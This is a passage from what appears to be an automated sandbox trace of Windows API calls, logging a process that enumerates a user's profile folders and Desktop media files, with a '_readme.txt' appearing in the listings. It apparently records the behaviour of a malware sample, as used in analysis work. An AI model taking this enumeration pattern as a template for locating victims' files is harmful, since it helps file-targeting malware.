ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67218 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x336f970 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67148 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3208 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b670e0 [0201.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3b67350 [0201.034] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0201.034] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdab224a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdab224a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0201.034] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88cab400, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cd1560, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0201.034] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88cab400, ftCreationTime.dwHighDateTime=0x1d60a66, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cd1560, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0201.034] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01a8 | out: hHeap=0x2c0000) returned 1 [0201.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceca8 | out: hHeap=0x2c0000) returned 1 [0201.034] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.034] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.034] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.034] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.034] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.035] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0201.035] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.035] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.035] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.035] PathFindFileNameW (pszPath="") returned="" [0201.035] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.035] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.035] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x37f2b820, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x37f2b820, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0201.035] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0201.035] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaeb45a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaeb45a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0201.035] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaeb45a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaeb45a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0201.035] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.035] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.035] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0201.035] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.036] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.036] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.036] PathFindFileNameW (pszPath="") returned="" [0201.036] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaeb45a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaeb45a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0201.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b98 | out: hHeap=0x2c0000) returned 1 [0201.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.036] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.036] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0201.036] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.036] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.036] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.036] PathFindFileNameW (pszPath="") returned="" [0201.036] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0201.037] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0201.037] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.037] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0201.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.037] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.037] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.037] PathFindFileNameW (pszPath="") returned="" [0201.037] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0201.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.038] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0201.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.038] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.038] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.038] PathFindFileNameW (pszPath="") returned="" [0201.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1e057380, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x1e057380, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1e057380, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x1e057380, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc540e50, ftCreationTime.dwHighDateTime=0x1d5dc74, ftLastAccessTime.dwLowDateTime=0x47fb8bc0, ftLastAccessTime.dwHighDateTime=0x1d5e054, ftLastWriteTime.dwLowDateTime=0x47fb8bc0, ftLastWriteTime.dwHighDateTime=0x1d5e054, nFileSizeHigh=0x0, nFileSizeLow=0x119d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-ps1uqay2Ko7 CqfFS9C.avi", cAlternateFileName="-PS1UQ~1.AVI")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8942b830, ftCreationTime.dwHighDateTime=0x1d5e516, ftLastAccessTime.dwLowDateTime=0xd8229b30, ftLastAccessTime.dwHighDateTime=0x1d5e3b5, ftLastWriteTime.dwLowDateTime=0xd8229b30, ftLastWriteTime.dwHighDateTime=0x1d5e3b5, nFileSizeHigh=0x0, nFileSizeLow=0x1292f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="01AV-Rj70.avi", cAlternateFileName="01AV-R~1.AVI")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc760b0, ftCreationTime.dwHighDateTime=0x1d5df1f, ftLastAccessTime.dwLowDateTime=0x8e5090a0, ftLastAccessTime.dwHighDateTime=0x1d5e0d8, ftLastWriteTime.dwLowDateTime=0x8e5090a0, ftLastWriteTime.dwHighDateTime=0x1d5e0d8, nFileSizeHigh=0x0, nFileSizeLow=0x1ac4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0kcmGQ10PrrBAp.m4a", cAlternateFileName="0KCMGQ~1.M4A")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea23410, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfe2c2090, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xfe2c2090, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x313f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Pj8-_DtMHl6Yj88dLx6.mkv", cAlternateFileName="1PJ8-_~1.MKV")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b988f0, ftCreationTime.dwHighDateTime=0x1d5dae2, ftLastAccessTime.dwLowDateTime=0x5821e780, ftLastAccessTime.dwHighDateTime=0x1d5e665, ftLastWriteTime.dwLowDateTime=0x5821e780, ftLastWriteTime.dwHighDateTime=0x1d5e665, nFileSizeHigh=0x0, nFileSizeLow=0xa820, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2ejZWLY05H.xls", cAlternateFileName="2EJZWL~1.XLS")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87149c30, ftCreationTime.dwHighDateTime=0x1d5da63, ftLastAccessTime.dwLowDateTime=0x692c8860, ftLastAccessTime.dwHighDateTime=0x1d5e4d9, ftLastWriteTime.dwLowDateTime=0x692c8860, ftLastWriteTime.dwHighDateTime=0x1d5e4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc66b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4niurrjakXCa-R3TEdF0.mp4", cAlternateFileName="4NIURR~1.MP4")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8218b050, ftCreationTime.dwHighDateTime=0x1d5d85a, ftLastAccessTime.dwLowDateTime=0x6e0bcfb0, ftLastAccessTime.dwHighDateTime=0x1d5da59, ftLastWriteTime.dwLowDateTime=0x6e0bcfb0, ftLastWriteTime.dwHighDateTime=0x1d5da59, nFileSizeHigh=0x0, nFileSizeLow=0x7b32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="atrloJQ04x.mp3", cAlternateFileName="ATRLOJ~1.MP3")) returned 1 [0201.038] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a5a9970, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0x4eb38ee0, 